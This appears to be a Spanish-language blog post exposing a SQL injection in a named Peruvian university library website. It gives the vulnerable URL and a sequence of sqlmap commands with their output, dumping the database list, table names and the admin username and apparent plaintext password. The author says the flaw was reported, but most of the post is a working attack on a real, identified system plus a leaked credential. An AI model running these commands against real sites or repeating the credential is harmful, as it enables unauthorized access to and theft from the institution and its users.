Hola, hace tiempo había leído que esta Universidad era una de las mejores de Perú, pero sin embargo no lo es, aunque no lo crean tiene las mismas vulnerabilidades que tienen todas las Universidades de Perú, la cual permite obtener toda su base de datos con un simple bug...
Bueno, sin mas que decir...
Sitio Web: http://www.sibus.usmp.edu.pe
Link Vulnerable: http://www.sibus.usmp.edu.pe/servicio.php?cat=1
Vulnerabilidad: SQL Injection
Base de datos desde el SLQMAP:
./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 --dbs
available databases [4]:
[*] biblioteca
[*] information_schema
[*] mysql
[*] test
./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca --tables
Database: biblioteca
[28 tables]
+-----------------------+
| adq_categoria |
| adquisicion |
| biblioteca_virtual |
| carne |
| directorio |
| docente_inscripcion |
| ebsco_inscripcion |
| egresado_inscripcion |
| enlace |
| galeria |
| galeria_fotos |
| guia_manual |
| imagen |
| info_general |
| infonauta |
| logo |
| martino |
| novedad |
| personal |
| personal_foto |
| publicaciones |
| reglamento |
| revista |
| revista_numero |
| servicio |
| temporada |
| usuario |
| visitante_inscripcion |
+-----------------------+
./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario --columns
Database: biblioteca
Table: usuario
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| login | varchar(50) |
| password | varchar(50) |
+----------+-------------+
./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario -C login,password --dump
Database: biblioteca
Table: usuario
[1 entry]
+-------+----------------+
| login | password |
+-------+----------------+
| admin | u5mpb1bl10tec@ |
+-------+----------------+
La Vulnerabilidad ha sido respectivamente REPORTADA, por lo tanto espero que sea arreglado lo mas pronto posible.
Saludos.
No hay comentarios:
Publicar un comentario